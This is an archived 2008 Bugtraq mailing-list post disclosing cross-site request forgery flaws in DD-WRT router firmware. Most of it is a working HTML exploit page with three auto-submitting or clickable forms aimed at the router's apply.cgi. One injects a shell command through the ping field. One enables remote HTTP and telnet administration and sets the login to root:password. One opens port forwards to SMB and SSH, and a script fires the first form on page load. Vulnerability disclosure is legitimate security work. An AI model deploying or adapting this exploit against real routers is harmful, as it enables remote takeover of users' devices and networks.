lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 8 Dec 2008 14:35:28 -0700
From: th3.r00k.ieatpork@...il.pork.com
To: bugtraq@...urityfocus.com
Subject: Multiple XSRF in DD-WRT (Remote Root Command Execution)

Author: Michael Brooks (!!!!)

I usually don't like posting my leet exploits to bugtraq because it is so unprofessional. You guys usually malform my exploits so they are totally useless,  even to someone trying to write a patch! You also tend to get the wrong name!  Michael Brooks wrote this!

Exploits tested on the newest stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:http://dd-wrt.com/

Impact:
1)Remote root command execution /bin/sh
2)Change web administration password and enable remote administration
3)create new Port Forwarding rules to bypass NAT.

<html>
       <head>
               <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
       </head>
       Remote root command execution /bin/sh
       <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
               <input name="submit_button" value="Ping" type="hidden">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="submit_type" value="start" type="hidden">
               <input name="change_action" value="gozila_cgi" type="hidden">
               <input name="next_page" value="Diagnostics.asp" type="hidden">
               <input name="ping_ip" value="echo owned">
               <input name="execute command" type="submit">
       </form><br><br>
       enable remote administration and change login to root:password
       <form method="post" action="http://192.168.1.1/apply.cgi">
               <input name="submit_button" value="Management" type="hidden">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="change_action" value="" type="hidden">
               <input name="submit_type" value="" type="hidden">
               <input name="commit" value="1" type="hidden">
               <input name="PasswdModify" value="0" type="hidden">
               <input name="remote_mgt_https" value="" type="hidden">
               <input name="http_enable" value="1" type="hidden">
               <input name="info_passwd" value="0" type="hidden">
               <input name="https_enable" value="" type="hidden">
               <input name="http_username" value="root" type="hidden">
               <input name="http_passwd" value="password" type="hidden">
               <input name="http_passwdConfirm" value="password" type="hidden">
               <input name="_http_enable" value="1" type="hidden">
               <input name="refresh_time" value="3" type="hidden">
               <input name="status_auth" value="1" type="hidden">
               <input name="maskmac" value="1" type="hidden">
               <input name="remote_management" value="1" type="hidden">
               <input name="http_wanport" value="8080" type="hidden">
               <input name="remote_mgt_telnet" value="1" type="hidden">
               <input name="telnet_wanport" value="23" type="hidden">
               <input name="boot_wait" value="on" type="hidden">
               <input name="cron_enable" value="1" type="hidden">
               <input name="cron_jobs" value="" type="hidden">
               <input name="loopback_enable" value="1" type="hidden">
               <input name="nas_enable" value="1" type="hidden">
               <input name="resetbutton_enable" value="1" type="hidden">
               <input name="zebra_enable" value="1" type="hidden">
               <input name="ip_conntrack_max" value="512" type="hidden">
               <input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
               <input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
               <input name="overclocking" value="200" type="hidden">
               <input name="router_style" value="yellow" type="hidden">
               <input name="Remote Admin" type="submit">
       </form><br><br>
       Change Port Forwarding to byass NAT protection.
       <form method="post" action="http://192.168.1.1/apply.cgi">
               <input name="submit_button" value="Change Port Forwarding" type="submit">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="change_action" value="" type="hidden">
               <input name="submit_type" value="" type="hidden">
               <input name="forward_spec" value="13" type="hidden">
               <input name="name0" value="Hacked" type="hidden">
               <input name="from0" value="4450" type="hidden">
               <input name="pro0" value="both" type="hidden">
               <input name="ip0" value="192.168.1.100" type="hidden">
               <input name="to0" value="445" type="hidden">
               <input name="enable0" value="on" type="hidden">
               <input name="name1" value="Hacked Again" type="hidden">
               <input name="from1" value="22" type="hidden">
               <input name="pro1" value="tcp" type="hidden">
               <input name="ip1" value="192.168.1.101" type="hidden">
               <input name="to1" value="22" type="hidden">
               <input name="enable1" value="on" type="hidden">
       </form>
</html>
<script>
       document.getElementById(1).submit();//remote root command execution!
</script>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ